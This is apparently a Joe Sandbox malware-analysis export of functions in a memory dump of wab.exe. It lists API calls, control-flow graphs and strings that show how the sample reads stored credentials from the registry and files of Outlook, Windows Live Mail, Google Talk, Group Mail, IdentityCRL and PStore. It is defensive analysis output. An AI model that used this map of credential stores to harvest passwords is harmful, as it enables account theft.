                                                                                                                                                • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                                                                • API String ID: 1197458902-317895162
                                                                                                                                                • Opcode ID: f6bc8121a93fa9ff4bc87b9f29a8f644e5a8c2d28e7501eaeea369390cda5a4c
                                                                                                                                                • Instruction ID: 8c3092e028ed30b7bcb0bf0438431f6e947b4810b401e401bf51def59c6c6aaf
                                                                                                                                                • Opcode Fuzzy Hash: f6bc8121a93fa9ff4bc87b9f29a8f644e5a8c2d28e7501eaeea369390cda5a4c
                                                                                                                                                • Instruction Fuzzy Hash: 5C51A571600615B6E714AF71CD86FEAB76CAF00709F20053FF904B61C2DBBDBA5486A9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 231 40f478-40f4ad call 4446d0 RegOpenKeyExA 234 40f4b3-40f4c7 RegOpenKeyExA 231->234 235 40f5af-40f5b5 231->235 236 40f5a5-40f5a9 RegCloseKey 234->236 237 40f4cd-40f4f6 RegQueryValueExA 234->237 236->235 238 40f59b-40f59f RegCloseKey 237->238 239 40f4fc-40f50b call 40472f 237->239 238->236 239->238 242 40f511-40f549 call 4047a0 239->242 242->238 245 40f54b-40f553 242->245 246 40f591-40f595 LocalFree 245->246 247 40f555-40f58c memcpy * 2 call 40f177 245->247 246->238 247->246
                                                                                                                                                APIs
                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E6C,?), ref: 0040F4A9
                                                                                                                                                • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E6C,?), ref: 0040F4C3
                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E6C,?), ref: 0040F4EE
                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E6C,?), ref: 0040F59F
                                                                                                                                                  • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                  • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                • memcpy.MSVCRT ref: 0040F55C
                                                                                                                                                • memcpy.MSVCRT ref: 0040F571
                                                                                                                                                  • Part of subcall function 0040F177: RegOpenKeyExA.ADVAPI32(0040F591,Creds,00000000,00020019,0040F591,0044FE50,00000040,?,?,0040F591,?,?,?,?), ref: 0040F1A1
                                                                                                                                                  • Part of subcall function 0040F177: memset.MSVCRT ref: 0040F1BF
                                                                                                                                                  • Part of subcall function 0040F177: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F2C3
                                                                                                                                                  • Part of subcall function 0040F177: RegCloseKey.ADVAPI32(?), ref: 0040F2D4
                                                                                                                                                • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E6C,?), ref: 0040F595
                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E6C,?), ref: 0040F5A9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                                                                • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                                                                                • API String ID: 2768085393-888555734
                                                                                                                                                • Opcode ID: 1864ca7fcc736b3b4d801ba3f1c1f05252c21c348af15f97a92f57202a3284fd
                                                                                                                                                • Instruction ID: 1e95abdde633212bff99c09de4f86b0a88236e9255236bdff490daf84838ddbe
                                                                                                                                                • Opcode Fuzzy Hash: 1864ca7fcc736b3b4d801ba3f1c1f05252c21c348af15f97a92f57202a3284fd
                                                                                                                                                • Instruction Fuzzy Hash: 3F316FB2108305BFD710DF51DC80D9BB7ECEB89758F00093AFA84E2151D734D9198BAA
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 249 44412e-44414a call 44431c GetModuleHandleA 252 44414c-444157 249->252 253 44416b-44416e 249->253 252->253 254 444159-444162 252->254 255 444197-4441e4 __set_app_type __p__fmode __p__commode call 444318 253->255 256 444164-444169 254->256 257 444183-444187 254->257 264 4441e6-4441f1 __setusermatherr 255->264 265 4441f2-44424c call 444306 _initterm __getmainargs _initterm 255->265 256->253 259 444170-444177 256->259 257->253 260 444189-44418b 257->260 259->253 262 444179-444181 259->262 263 444191-444194 260->263 262->263 263->255 264->265 268 44424e-444256 265->268 269 444288-44428b 265->269 270 44425c-44425f 268->270 271 444258-44425a 268->271 272 444265-444269 269->272 273 44428d-444291 269->273 270->272 274 444261-444262 270->274 271->268 271->270 275 44426f-444280 GetStartupInfoA 272->275 276 44426b-44426d 272->276 273->269 274->272 277 444282-444286 275->277 278 444293-444295 275->278 276->274 276->275 279 444296-4442aa GetModuleHandleA call 40cc66 277->279 278->279 282 4442b3-4442f3 _cexit call 444355 279->282 283 4442ac-4442ad exit 279->283 283->282
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3662548030-0
                                                                                                                                                • Opcode ID: 871beeaf43a2e3e1ebbf438e66662d4fa1d9833c620b3867bfec3142b5046d35
                                                                                                                                                • Instruction ID: fc298a0057bb7b157c7d5bb9a283569fada43ed9a32b195ba4478b44b5386df1
                                                                                                                                                • Opcode Fuzzy Hash: 871beeaf43a2e3e1ebbf438e66662d4fa1d9833c620b3867bfec3142b5046d35
                                                                                                                                                • Instruction Fuzzy Hash: 9E419F74D00714DFEB209FA4D8897AE7BB4BB85715F20016BF4519B2A2D7B88C82CB58
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004437F8
                                                                                                                                                  • Part of subcall function 0040732D: strlen.MSVCRT ref: 0040732F
                                                                                                                                                  • Part of subcall function 0040732D: strlen.MSVCRT ref: 0040733A
                                                                                                                                                  • Part of subcall function 0040732D: _mbscat.MSVCRT ref: 00407351
                                                                                                                                                  • Part of subcall function 0041072B: memset.MSVCRT ref: 00410780
                                                                                                                                                  • Part of subcall function 0041072B: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 004107E9
                                                                                                                                                  • Part of subcall function 0041072B: _mbscpy.MSVCRT ref: 004107F7
                                                                                                                                                • memset.MSVCRT ref: 00443866
                                                                                                                                                • memset.MSVCRT ref: 00443881
                                                                                                                                                  • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004438BA
                                                                                                                                                • strlen.MSVCRT ref: 004438C8
                                                                                                                                                • _strcmpi.MSVCRT ref: 004438EE
                                                                                                                                                Strings
                                                                                                                                                • \Microsoft\Windows Mail, xrefs: 00443816
                                                                                                                                                • \Microsoft\Windows Live Mail, xrefs: 0044383D
                                                                                                                                                • Store Root, xrefs: 00443892
                                                                                                                                                • Software\Microsoft\Windows Live Mail, xrefs: 00443897
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                                                                • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                                                                • API String ID: 832325562-2578778931
                                                                                                                                                • Opcode ID: 911bb342f14f3170cb2ff673aa6b7b07c4e29c197a8c78c2517f4db812832f04
                                                                                                                                                • Instruction ID: 024f477f45f6e85a7703d2448ebd5bdc30730893e4efb81a5a52e1788c76f972
                                                                                                                                                • Opcode Fuzzy Hash: 911bb342f14f3170cb2ff673aa6b7b07c4e29c197a8c78c2517f4db812832f04
                                                                                                                                                • Instruction Fuzzy Hash: 723166B2508344AAF320FB99DC47FCB77DC9B88715F14441FF648D7182EA78964487AA
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 308 40edd5-40ef32 memset * 2 call 407649 * 2 RegOpenKeyExA 313 40ef38-40ef5f RegQueryValueExA 308->313 314 40f04e-40f054 308->314 315 40f045-40f048 RegCloseKey 313->315 316 40ef65-40ef69 313->316 315->314 316->315 317 40ef6f-40ef79 316->317 318 40ef7b-40ef8d call 404666 call 40472f 317->318 319 40efec 317->319 329 40efdf-40efea call 404780 318->329 330 40ef8f-40efb3 call 4047a0 318->330 320 40efef-40eff2 319->320 320->315 322 40eff4-40f034 call 4012ee RegQueryValueExA 320->322 322->315 328 40f036-40f044 322->328 328->315 329->320 330->329 335 40efb5-40efb8 330->335 336 40efd6-40efd9 LocalFree 335->336 337 40efba-40efcf memcpy 335->337 336->329 337->336
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040EEDC
                                                                                                                                                • memset.MSVCRT ref: 0040EEF4
                                                                                                                                                  • Part of subcall function 00407649: _mbsnbcat.MSVCRT ref: 00407669
                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040EF2A
                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040EF57
                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F02C
                                                                                                                                                  • Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5
                                                                                                                                                  • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                  • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                • memcpy.MSVCRT ref: 0040EFC7
                                                                                                                                                • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040EFD9
                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F048
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2012582556-3916222277
                                                                                                                                                • Opcode ID: 1aaa39dbd8fb085207e3379016ade5c185f92c0e596cea5d3bc0b7e8a3d19efa
                                                                                                                                                • Instruction ID: 747b8e804c7bbb21ad1dd8da88f93546a58f2d2a8080c646c51fe7008e5948b4
                                                                                                                                                • Opcode Fuzzy Hash: 1aaa39dbd8fb085207e3379016ade5c185f92c0e596cea5d3bc0b7e8a3d19efa
                                                                                                                                                • Instruction Fuzzy Hash: 83811E618087CB9ECB21DBBC8C445DDBF745F17234F0843A9E5B47A2E2D3245A46C7AA
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 338 4037bc-40380e memset * 2 call 443a35 341 4038d4-4038d7 338->341 342 403814-403874 call 4021ad call 406ca4 * 2 strchr 338->342 349 403876-403887 _mbscpy 342->349 350 403889-403894 strlen 342->350 351 4038b1-4038cf _mbscpy call 4023d7 349->351 350->351 352 403896-4038ae sprintf 350->352 351->341 352->351
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004037DD
                                                                                                                                                • memset.MSVCRT ref: 004037F1
                                                                                                                                                  • Part of subcall function 00443A35: memset.MSVCRT ref: 00443A57
                                                                                                                                                  • Part of subcall function 00443A35: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00443AC3
                                                                                                                                                  • Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
                                                                                                                                                  • Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE
                                                                                                                                                • strchr.MSVCRT ref: 00403860
                                                                                                                                                • _mbscpy.MSVCRT ref: 0040387D
                                                                                                                                                • strlen.MSVCRT ref: 00403889
                                                                                                                                                • sprintf.MSVCRT ref: 004038A9
                                                                                                                                                • _mbscpy.MSVCRT ref: 004038BF
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                                                                • String ID: %s@yahoo.com
                                                                                                                                                • API String ID: 317221925-3288273942
                                                                                                                                                • Opcode ID: c01e396ce511f8afc2eb7639449ba7f1f99c67e08b3586f0ab7a0846487aca4e
                                                                                                                                                • Instruction ID: 0355cd0d48ae578dfdfe4a6cbfa0b9af13deca75d91fcedaec1ea3361aee035e
                                                                                                                                                • Opcode Fuzzy Hash: c01e396ce511f8afc2eb7639449ba7f1f99c67e08b3586f0ab7a0846487aca4e
                                                                                                                                                • Instruction Fuzzy Hash: D0215773D0412C5EEB21EA55DD41BDA77ACDF45308F0000EBB648F6081E6789F588F55
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 354 4034d6-403536 memset * 2 call 410493 357 403572-403574 354->357 358 403538-403571 _mbscpy call 406af3 _mbscat call 4033e2 354->358 358->357
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004034F6
                                                                                                                                                • memset.MSVCRT ref: 0040350C
                                                                                                                                                  • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                                                                                                                                • _mbscpy.MSVCRT ref: 00403547
                                                                                                                                                  • Part of subcall function 00406AF3: strlen.MSVCRT ref: 00406AF4
                                                                                                                                                  • Part of subcall function 00406AF3: _mbscat.MSVCRT ref: 00406B0B
                                                                                                                                                • _mbscat.MSVCRT ref: 0040355F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                                                                • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                                                • API String ID: 3071782539-966475738
                                                                                                                                                • Opcode ID: e35c848a323c92a1d31842152f609aeddade97801a3e26e866ac83a52e1d0630
                                                                                                                                                • Instruction ID: 06cca456285af6d778403e239192c4ceeddf5a100a2cf1fec545289e95a886a3
                                                                                                                                                • Opcode Fuzzy Hash: e35c848a323c92a1d31842152f609aeddade97801a3e26e866ac83a52e1d0630
                                                                                                                                                • Instruction Fuzzy Hash: 6901F07294412866EB20F2658C46FCB7A5C9B65705F0000B7BA49F20C3D9F86BD486A9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 363 40c9f7-40ca26 ??2@YAPAXI@Z 364 40ca28-40ca2d 363->364 365 40ca2f 363->365 366 40ca31-40ca44 ??2@YAPAXI@Z 364->366 365->366 367 40ca46-40ca4d call 40400d 366->367 368 40ca4f 366->368 370 40ca51-40ca77 367->370 368->370 372 40ca86-40caf9 call 406e26 call 4019b4 memset LoadIconA call 4019b4 _mbscpy 370->372 373 40ca79-40ca80 DeleteObject 370->373 373->372
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2054149589-0
                                                                                                                                                • Opcode ID: d475ca6c561f5eaf4fc753d3c68d3f995f62fff83656612615d29b2a36e03343
                                                                                                                                                • Instruction ID: 30546b7ffc0c4dd123ee27c8339ba671db17b069e44cca125f5e111fbf26b461
                                                                                                                                                • Opcode Fuzzy Hash: d475ca6c561f5eaf4fc753d3c68d3f995f62fff83656612615d29b2a36e03343
                                                                                                                                                • Instruction Fuzzy Hash: D22190B5900324DBDB10EF648CC97D97BA8AB44705F1445BBEE08EF296D7B849408BA9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00408043: memset.MSVCRT ref: 004080A5
                                                                                                                                                  • Part of subcall function 00408043: memset.MSVCRT ref: 004080B9
                                                                                                                                                  • Part of subcall function 00408043: memset.MSVCRT ref: 004080D3
                                                                                                                                                  • Part of subcall function 00408043: memset.MSVCRT ref: 004080E8
                                                                                                                                                  • Part of subcall function 00408043: GetComputerNameA.KERNEL32(?,?), ref: 0040810A
                                                                                                                                                  • Part of subcall function 00408043: GetUserNameA.ADVAPI32(?,?), ref: 0040811E
                                                                                                                                                  • Part of subcall function 00408043: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040813D
                                                                                                                                                  • Part of subcall function 00408043: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00408152
                                                                                                                                                  • Part of subcall function 00408043: strlen.MSVCRT ref: 0040815B
                                                                                                                                                  • Part of subcall function 00408043: strlen.MSVCRT ref: 0040816A
                                                                                                                                                  • Part of subcall function 00408043: memcpy.MSVCRT ref: 0040817C
                                                                                                                                                  • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                • memset.MSVCRT ref: 00408392
                                                                                                                                                  • Part of subcall function 004104D7: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 004104FA
                                                                                                                                                • memset.MSVCRT ref: 004083E3
                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00408421
                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00408448
                                                                                                                                                Strings
                                                                                                                                                • Software\Google\Google Talk\Accounts, xrefs: 00408363
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
                                                                                                                                                • String ID: Software\Google\Google Talk\Accounts
                                                                                                                                                • API String ID: 2959138223-1079885057
                                                                                                                                                • Opcode ID: de50773ad60ad315725188ace9b51b45ce00f3af3b72c9474aab8c158646e734
                                                                                                                                                • Instruction ID: c6fde65740424625f6a31d6a262b66ef11e3a8462d59295f471bfbb40e3c967b
                                                                                                                                                • Opcode Fuzzy Hash: de50773ad60ad315725188ace9b51b45ce00f3af3b72c9474aab8c158646e734
                                                                                                                                                • Instruction Fuzzy Hash: 5E2183B100824AAED610DF51DD42EABB7DCEF94344F00043EFA84911A2F675DD5D9BAB
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 403 40b783-40b795 404 40b7e2-40b7f6 call 406a00 403->404 405 40b797-40b7ad call 407baf _mbsicmp 403->405 427 40b7f8 call 410411 404->427 428 40b7f8 call 404780 404->428 429 40b7f8 call 403c03 404->429 430 40b7f8 call 410166 404->430 431 40b7f8 call 40472f 404->431 410 40b7d6-40b7e0 405->410 411 40b7af-40b7c8 call 407baf 405->411 410->404 410->405 417 40b7ca-40b7cd 411->417 418 40b7cf 411->418 412 40b7fb-40b80e call 407bbf 419 40b810-40b81c 412->419 420 40b855-40b864 SetCursor 412->420 421 40b7d0-40b7d1 call 40b340 417->421 418->421 422 40b833-40b852 qsort 419->422 423 40b81e-40b829 419->423 421->410 422->420 423->422 427->412 428->412 429->412 430->412 431->412
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Cursor_mbsicmpqsort
                                                                                                                                                • String ID: /nosort$/sort
                                                                                                                                                • API String ID: 882979914-1578091866
                                                                                                                                                • Opcode ID: 3fd05ea3d2e473999241c6e710ee6662cc18b56f225bb7025ede358bdfc82e44
                                                                                                                                                • Instruction ID: 59731eef90b6f0024c6c95bb6f71fb6a55e53d5caa10bc7ba91746e522f0a21b
                                                                                                                                                • Opcode Fuzzy Hash: 3fd05ea3d2e473999241c6e710ee6662cc18b56f225bb7025ede358bdfc82e44
                                                                                                                                                • Instruction Fuzzy Hash: AF21C4B1704501EFD719AB75C880AA9F3A8FF88314F21013EF419A7292C738B8118B99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 445 41072b-410742 call 41067e 448 410744-41074d call 406e4c 445->448 449 41076d-41078b memset 445->449 457 41074f-410752 448->457 458 41075e-410761 448->458 451 410797-4107a5 449->451 452 41078d-410790 449->452 455 4107b5-4107bf call 410411 451->455 452->451 454 410792-410795 452->454 454->451 459 4107a7-4107b0 454->459 462 4107c1-4107e9 call 4106ad call 410452 RegCloseKey 455->462 463 4107ef-410802 _mbscpy 455->463 457->449 461 410754-410757 457->461 465 410768 458->465 459->455 461->449 464 410759-41075c 461->464 462->463 467 410805-410807 463->467 464->449 464->458 465->467
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0041067E: LoadLibraryA.KERNEL32(shell32.dll,0041073A,00000104), ref: 0041068C
                                                                                                                                                  • Part of subcall function 0041067E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004106A1
                                                                                                                                                • memset.MSVCRT ref: 00410780
                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 004107E9
                                                                                                                                                • _mbscpy.MSVCRT ref: 004107F7
                                                                                                                                                  • Part of subcall function 00406E4C: GetVersionExA.KERNEL32(00451168,0000001A,00410749,00000104), ref: 00406E66
                                                                                                                                                Strings
                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0041079B, 004107AB
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                • API String ID: 889583718-2036018995
                                                                                                                                                • Opcode ID: 24424f8fb7c37ab6dcf975350972c994308c6069d3110df9dc8122139225ba6f
                                                                                                                                                • Instruction ID: 55274f9b0d4144c5a5f6b064647028c43f69cf0431b3c32ec78c32e38a1c383e
                                                                                                                                                • Opcode Fuzzy Hash: 24424f8fb7c37ab6dcf975350972c994308c6069d3110df9dc8122139225ba6f
                                                                                                                                                • Instruction Fuzzy Hash: 2811D071C00218FBEB24F6948C85EEF77AC9B15304F1400B7F95161192E6B99ED4CA99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • FindResourceA.KERNEL32(?,?,?), ref: 004105EA
                                                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 004105FB
                                                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 0041060B
                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 00410616
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3473537107-0
                                                                                                                                                • Opcode ID: aa79f82f4ecfd8f7b628c1d7de4cc48f572b3be46360eaed4676304fbba1ef3c
                                                                                                                                                • Instruction ID: 4a68303d5b5253afd20c9a06ef53f1b3f3171458fb19c91adc6236e38678b247
                                                                                                                                                • Opcode Fuzzy Hash: aa79f82f4ecfd8f7b628c1d7de4cc48f572b3be46360eaed4676304fbba1ef3c
                                                                                                                                                • Instruction Fuzzy Hash: 88019636600315AB8F155F65DC4599F7FAAFFD63917088036F909CA361D7B1C891C68C
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0041036C
                                                                                                                                                  • Part of subcall function 0040735C: sprintf.MSVCRT ref: 00407394
                                                                                                                                                  • Part of subcall function 0040735C: memcpy.MSVCRT ref: 004073A7
                                                                                                                                                • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410390
                                                                                                                                                • memset.MSVCRT ref: 004103A7
                                                                                                                                                • GetPrivateProfileStringA.KERNEL32(?,?,0044551F,?,00002000,?), ref: 004103C5
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3143880245-0
                                                                                                                                                • Opcode ID: 300669213aa10e30692949e2fcfbaed099003638c554249b47492bf17e1db58e
                                                                                                                                                • Instruction ID: 9d0f41c8c3888dc292d70de46467aaf9ffb36b28435196f73ffda5293cd27e0f
                                                                                                                                                • Opcode Fuzzy Hash: 300669213aa10e30692949e2fcfbaed099003638c554249b47492bf17e1db58e
                                                                                                                                                • Instruction Fuzzy Hash: B501847280431DBFEF116F60EC89EDB7B79EF04314F1000A6FA08A2052D6759D64DB69
                                                                                                                                                Uniqueness

